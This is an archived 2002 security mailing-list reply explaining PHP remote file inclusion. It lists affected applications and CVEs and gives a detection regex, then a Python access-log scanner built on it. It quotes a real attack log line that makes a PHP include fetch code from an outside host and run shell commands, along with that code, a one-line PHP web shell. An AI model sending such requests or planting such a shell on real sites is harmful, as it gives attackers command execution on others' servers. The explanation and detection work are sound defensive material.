Re: Good practical php attack example

From: Steven M. Christey (coleyat_private)
Date: Wed Sep 18 2002 - 19:49:26 PDT

    zeno <bugtraqat_private> said:
    
    >I figured a few people may find this interesting.
    >
    >
    >200.152.80.22 - - [14/Sep/2002:16:47:23 -0400] "GET /index.php?file=http://www.jtecx.hpg.com.br/jtec.txt&cmd=uname%20-a;id HTTP/1.0" 404 2656 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Q312461)"
    >
    >contents of www.jtecx.hpg.com.br/jtec.txt
    >
    >------------------- start snip
    >
    ><?php 
    >system($cmd); 
    >?>
    >
    >------------------- end snip
    
    A number of PHP scripts have demonstrated this type of vulnerability,
    which was documented in "A Study In Scarlet - Exploiting Common
    Vulnerabilities in PHP Applications" by Shaun Clowes; see
    http://www.securereality.com.au/studyinscarlet.txt
    (http://www.zend.com/zend/art/art-oertli.php also looks useful).  This
    has been a topic of discussion on the webappsec list.
    
    Basically, PHP can allow the programmer to access files from remote
    sites.  PHP scripts that don't properly filter arguments to an
    "include" command can have a remote URL injected by the attacker.  PHP
    also allows you to define variables as a parameter (field) into the
    script.  The combination of these factors makes it easy for an
    attacker to execute code in the vulnerable application.  Note: this
    may be dependent on configuration and/or the PHP version.
    
    Some vulnerable applications are:
    
      BUGTRAQ:20001125 Security problems with TWIG webmail system
      URL:http://marc.theaimsgroup.com/?l=bugtraq&m=97535137010910&w=2
      (CVE: CVE-2000-1166)
    
      BUGTRAQ:20020116 PHP-Nuke allows Command Execution & Much more
      URL:http://marc.theaimsgroup.com/?l=bugtraq&m=101121913914205&w=2
      (CVE: CAN-2002-0206)
    
      [this could be the vulnerability being exploited in zeno's example]
    
      BUGTRAQ:20020506 b2 php remote command execution
      URL:http://marc.theaimsgroup.com/?l=bugtraq&m=102069726727513&w=2
      (CVE: CAN-2002-0734)
    
      BUGTRAQ:20020517 Phorum 3.3.2a remote command execution
      URL:http://marc.theaimsgroup.com/?l=bugtraq&m=102167071314746&w=2
      (CVE: CAN-2002-0764)
    
    A generic Perl regular expression to catch some of these exploits is:
    
      /\.php[2-9]?\?.*=http:\/\//
    
    This seems to do a good job, although it could generate some false
    positives for valid PHP scripts that pass URLs as arguments, e.g. for
    redirecting the user out of the site.
    
    - Steve
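    As an added example (not code from Steve's post or from any of the projects cited), the Perl signature above translated into a small Python scanner that runs over access-log lines, decodes the query string so the injected command is readable, and separates a URL passed to a known redirect parameter (the false-positive case mentioned) from a URL passed to anything else; the redirect parameter names and the two benign log lines are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Perl signature from the post, translated to Python: a .php (or .php2-.php9)
# script whose query string assigns an http:// URL to some parameter.
RFI_SIGNATURE = re.compile(r"\.php[2-9]?\?.*=http://")

# Apache-style log: client, ident, user, [timestamp], "request line", status, ...
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" (?P<status>\d{3})'
)

# Parameter names that legitimately carry a URL on this site (assumption; tune locally).
REDIRECT_PARAMS = {"url", "redirect", "goto", "return"}

def scan_line(line):
    """Return a finding for a line matching the signature, else None."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    request = m.group("request")
    if not RFI_SIGNATURE.search(request):
        return None
    # Request line is "METHOD path HTTP/x.y"; split on "&" ourselves so a ";"
    # inside a value (as in uname -a;id) is kept rather than treated as a separator.
    parts = request.split(" ")
    path = parts[1] if len(parts) >= 2 else request
    params = {}
    for pair in path.partition("?")[2].split("&"):
        k, _, v = pair.partition("=")
        params[unquote_plus(k)] = unquote_plus(v)
    url_params = [k for k, v in params.items() if v.startswith("http://")]
    # A URL in a non-redirect parameter (file=, page=, ...) is the include pattern.
    suspicious = any(k not in REDIRECT_PARAMS for k in url_params)
    return {
        "ip": m.group("ip"),
        "timestamp": m.group("ts"),
        "status": int(m.group("status")),
        "url_params": url_params,
        "params": params,
        "verdict": "possible-rfi" if suspicious else "url-param-benign",
    }

def scan_log(lines):
    return [f for f in (scan_line(l) for l in lines) if f]

# Sample log: the first line is the request quoted in zeno's post; the other two
# are constructed here (a legitimate redirect, and an include with a local name).
SAMPLE_LOG = [
    '200.152.80.22 - - [14/Sep/2002:16:47:23 -0400] "GET /index.php?file=http://www.jtecx.hpg.com.br/jtec.txt&cmd=uname%20-a;id HTTP/1.0" 404 2656 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Q312461)"',
    '192.0.2.10 - - [14/Sep/2002:17:02:11 -0400] "GET /go.php?url=http://www.example.org/ HTTP/1.0" 302 0 "-" "Mozilla/4.0"',
    '192.0.2.11 - - [14/Sep/2002:17:05:40 -0400] "GET /index.php?file=about HTTP/1.0" 200 1200 "-" "Mozilla/4.0"',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["verdict"], finding["ip"], finding["params"])
```

    Against the sample log the first line is reported as possible-rfi with the decoded cmd value, the redirect line as url-param-benign, and the third line produces no finding.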
    
    